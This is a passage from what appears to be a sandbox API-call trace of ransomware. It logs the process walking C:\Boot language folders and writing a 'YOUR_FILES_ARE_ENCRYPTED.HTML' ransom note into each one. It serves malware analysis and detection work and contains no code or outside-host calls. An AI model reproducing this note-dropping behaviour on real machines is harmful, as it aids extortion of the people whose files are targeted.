(pszPath="bootmgr.exe.mui") returned=".mui" [0104.673] lstrlenW (lpString=".mui") returned 4 [0104.673] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.673] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0104.673] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0104.674] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ro-RO\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.674] GetProcessHeap () returned 0x600000 [0104.674] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.674] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ro-RO\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\ro-ro\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.674] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.675] CloseHandle (hObject=0x300) returned 1 [0104.675] GetProcessHeap () returned 0x600000 [0104.675] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.675] GetProcessHeap () returned 0x600000 [0104.675] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.676] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0104.676] StrStrIW (lpFirst="ru-RU", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.676] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU") returned 17 [0104.676] GetProcessHeap () returned 0x600000 [0104.676] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.677] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\ru-RU" | out: lpString1="\\\\?\\C:\\Boot\\ru-RU") returned="\\\\?\\C:\\Boot\\ru-RU" [0104.677] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\ru-RU", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\ru-RU\\*") returned="\\\\?\\C:\\Boot\\ru-RU\\*" [0104.677] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ru-RU\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626978 [0104.677] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.677] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.677] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.677] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 33 [0104.677] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.677] lstrlenW (lpString=".mui") returned 4 [0104.677] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.677] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211a0897, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf60, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.677] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.677] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\memtest.exe.mui") returned 33 [0104.677] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.677] lstrlenW (lpString=".mui") returned 4 [0104.677] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.677] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211a0897, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf60, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.678] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0104.678] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.678] GetProcessHeap () returned 0x600000 [0104.678] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.678] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\ru-ru\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.680] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.681] CloseHandle (hObject=0x300) returned 1 [0104.681] GetProcessHeap () returned 0x600000 [0104.681] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.681] GetProcessHeap () returned 0x600000 [0104.681] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.682] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0104.682] StrStrIW (lpFirst="sk-SK", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.682] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sk-SK") returned 17 [0104.682] GetProcessHeap () returned 0x600000 [0104.682] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.683] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\sk-SK" | out: lpString1="\\\\?\\C:\\Boot\\sk-SK") returned="\\\\?\\C:\\Boot\\sk-SK" [0104.683] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\sk-SK", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\sk-SK\\*") returned="\\\\?\\C:\\Boot\\sk-SK\\*" [0104.683] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sk-SK\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0104.683] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.683] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.683] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.684] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sk-SK\\bootmgr.exe.mui") returned 33 [0104.684] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.684] lstrlenW (lpString=".mui") returned 4 [0104.684] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.684] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0104.684] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0104.684] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sk-SK\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.684] GetProcessHeap () returned 0x600000 [0104.684] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.684] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sk-SK\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\sk-sk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.684] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.685] CloseHandle (hObject=0x300) returned 1 [0104.685] GetProcessHeap () returned 0x600000 [0104.685] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.685] GetProcessHeap () returned 0x600000 [0104.685] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.686] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0104.686] StrStrIW (lpFirst="sl-SI", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.686] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sl-SI") returned 17 [0104.686] GetProcessHeap () returned 0x600000 [0104.686] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.687] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\sl-SI" | out: lpString1="\\\\?\\C:\\Boot\\sl-SI") returned="\\\\?\\C:\\Boot\\sl-SI" [0104.687] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\sl-SI", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\sl-SI\\*") returned="\\\\?\\C:\\Boot\\sl-SI\\*" [0104.687] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sl-SI\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0104.687] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.687] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.687] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.687] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sl-SI\\bootmgr.exe.mui") returned 33 [0104.687] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.687] lstrlenW (lpString=".mui") returned 4 [0104.687] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.687] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0104.688] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0104.688] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sl-SI\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.688] GetProcessHeap () returned 0x600000 [0104.688] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.688] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sl-SI\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\sl-si\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.688] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.689] CloseHandle (hObject=0x300) returned 1 [0104.689] GetProcessHeap () returned 0x600000 [0104.689] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.689] GetProcessHeap () returned 0x600000 [0104.689] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.690] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0104.690] StrStrIW (lpFirst="sr-Latn-CS", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.690] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sr-Latn-CS") returned 22 [0104.690] GetProcessHeap () returned 0x600000 [0104.690] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.691] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\sr-Latn-CS" | out: lpString1="\\\\?\\C:\\Boot\\sr-Latn-CS") returned="\\\\?\\C:\\Boot\\sr-Latn-CS" [0104.691] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\sr-Latn-CS", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\sr-Latn-CS\\*") returned="\\\\?\\C:\\Boot\\sr-Latn-CS\\*" [0104.691] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sr-Latn-CS\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0104.692] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.692] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.692] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.692] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui") returned 38 [0104.692] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.692] lstrlenW (lpString=".mui") returned 4 [0104.692] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.692] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.692] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.692] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sr-Latn-CS\\memtest.exe.mui") returned 38 [0104.692] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.692] lstrlenW (lpString=".mui") returned 4 [0104.692] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.692] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.692] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0104.692] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\sr-Latn-CS\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 52 [0104.692] GetProcessHeap () returned 0x600000 [0104.692] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.692] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-CS\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\sr-latn-cs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.694] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.694] CloseHandle (hObject=0x300) returned 1 [0104.695] GetProcessHeap () returned 0x600000 [0104.695] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.695] GetProcessHeap () returned 0x600000 [0104.695] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.695] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, 